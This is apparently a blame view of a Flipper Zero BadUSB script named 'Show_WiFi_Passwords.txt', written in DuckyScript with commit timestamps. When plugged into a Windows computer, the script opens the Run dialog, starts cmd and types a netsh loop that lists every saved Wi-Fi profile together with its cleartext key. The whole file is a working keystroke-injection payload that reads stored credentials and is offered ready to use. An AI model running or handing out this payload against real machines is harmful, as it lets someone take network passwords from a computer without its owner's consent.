Flipper/BadUSB/Show_WiFi_Passwords.txt

9 lines
234 B
Plaintext
Raw Normal View History

2022-06-14 01:23:02 +00:00
DELAY 3000
2022-05-18 12:58:12 +00:00
GUI r
DELAY 1000
STRING cmd
2022-05-18 12:58:12 +00:00
ENTER
DELAY 1000
STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content"
2022-05-18 12:58:12 +00:00
ENTER